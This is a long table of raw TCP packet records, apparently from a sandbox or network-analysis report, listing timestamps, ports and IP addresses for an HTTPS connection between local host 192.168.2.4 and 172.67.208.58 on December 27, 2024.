                                                                                                                                                                                            Dec 27, 2024 20:23:45.907535076 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.910584927 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.910600901 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.910650969 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.910660982 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.910698891 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.916112900 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.916153908 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.916177988 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.916189909 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.916217089 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.923192978 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.923207045 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.923244953 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.923257113 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.923289061 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.931519985 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.931535959 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.931601048 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.931612968 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.938199043 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.938214064 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.938258886 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.938267946 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.938298941 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.946026087 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.946041107 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.946099043 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:45.946110010 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:45.990829945 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.085537910 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.085557938 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.085614920 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.085629940 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.085671902 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.092415094 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.092432022 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.092483997 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.092494011 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.092530966 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.100265026 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.100296021 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.100325108 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.100339890 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.100367069 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.100387096 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.108068943 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.108087063 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.108124971 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.108133078 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.108165026 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.108181953 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.114928007 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.114943981 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.114996910 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.115005016 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.115045071 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.123430014 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.123445988 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.123481035 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.123487949 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.123501062 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.123527050 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.130163908 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.130181074 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.130228043 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.130237103 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.130275011 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.138031006 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.138046980 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.138099909 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.138109922 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.138150930 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.140176058 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.140223026 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.229739904 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.278898001 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.278915882 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.278974056 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.279015064 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.279035091 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.279622078 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.286643028 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.286659956 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.286708117 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.286719084 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.286734104 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.286756039 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.294636011 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.294655085 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.294723988 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.294735909 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.294781923 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.301362991 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.301381111 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.301440954 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.301450968 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.301507950 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.309699059 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.309715033 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.309793949 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.309804916 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.309853077 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.316576958 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.316593885 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.316654921 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.316664934 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.316704988 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.324446917 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.324465036 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.324531078 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.324542046 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.324583054 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.332233906 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.332250118 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.332340956 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.332354069 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.332397938 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.471637964 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.471673965 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.471698046 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.471726894 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.471741915 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.471760988 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.478766918 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.478784084 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.478832960 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.478842020 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.478867054 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.478880882 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.485645056 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.485661983 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.485698938 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.485707045 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.485744953 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.486351013 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.493515968 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.493531942 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.493585110 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.493594885 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.493630886 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.500875950 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.500893116 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.500950098 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.500960112 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.500998974 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.508740902 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.508755922 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.508800030 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.508810997 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.508851051 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.516568899 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.516587973 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.516624928 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.516638994 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.516652107 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.516912937 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.524099112 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.524118900 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.524157047 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.524188042 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.724159002 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.724184036 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.724267960 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.725811005 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.725819111 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.725833893 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.725956917 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.725964069 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.725984097 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.726003885 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.726020098 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.726028919 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.726140976 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.726149082 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.726192951 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.749804020 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.750421047 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.855627060 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.855649948 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.855761051 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.855784893 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.855837107 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.862417936 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.862436056 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.862500906 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.862517118 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.862557888 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.870346069 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.870362043 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.870435953 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.870445967 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.870488882 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.878302097 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.878319025 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.878385067 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.878393888 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.878434896 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.885847092 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.885863066 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.885941029 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.885951042 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.885998964 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.893395901 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.893413067 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.893486023 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.893496037 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.893552065 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.900291920 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.900311947 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.900379896 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.900389910 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.901093960 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.908169985 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.908200026 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.908265114 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:46.908273935 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:46.908318043 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.080935001 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.080952883 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.081073999 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.081119061 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.081182957 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.088387012 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.088402987 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.088475943 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.088494062 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.088548899 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.096446991 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.096467018 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.096539974 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.096555948 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.096606970 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.103728056 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.103744030 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.103818893 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.103835106 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.103893042 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.111465931 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.111504078 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.111576080 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.111591101 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.111649036 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.118338108 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.118355989 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.118447065 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.118462086 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.118511915 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.126281977 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.126302004 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.126494884 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.126509905 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.126571894 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.134022951 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.134040117 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.134121895 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.134141922 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.134205103 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.308517933 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.308537006 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.308624029 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.308645964 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.308700085 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.315398932 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.315418005 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.315512896 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.315529108 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.315576077 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.323266983 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.323282957 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.323363066 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.323379040 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.323435068 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.331084967 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.331103086 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.331183910 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.331203938 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.331258059 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.338502884 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.338521957 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.338599920 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.338614941 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.338665009 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.346302032 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.346318007 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.346395969 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:47.346411943 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:47.346462965 CET49747443192.168.2.4172.67.208.58
